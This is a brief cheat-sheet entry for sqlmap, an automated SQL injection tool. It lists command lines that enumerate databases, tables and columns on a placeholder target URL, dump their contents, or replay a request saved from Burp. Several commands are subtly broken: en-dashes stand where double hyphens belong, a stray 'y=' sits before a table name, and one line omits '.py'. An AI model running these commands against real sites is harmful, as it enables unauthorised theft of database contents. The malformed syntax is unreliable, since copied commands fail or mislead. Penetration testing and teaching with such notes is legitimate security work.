sqlmap
- Automated sql injection and database takeover tool.
- Usage:
- python sqlmap.py -u "http://www.target.com/vuln.php?id=1" [--dbs --tables --columns] (To Enumerate database or Tables or Columns)
- python sqlmap.py -u "http://www.target.com/vuln.php?id=1" [-D dbname -T y=tblname -C colname] --dump (When you know DB name, table name or column name and dump the data)
- python sqlmap -u "http://www.target.com/vuln.php?id=1" –method "POST" –data "postformdata" -D dbname -T tblname –dump
- python sqlmap.py -r request.txt [--dbs --tables --columns] (If you hav e saved request from burp)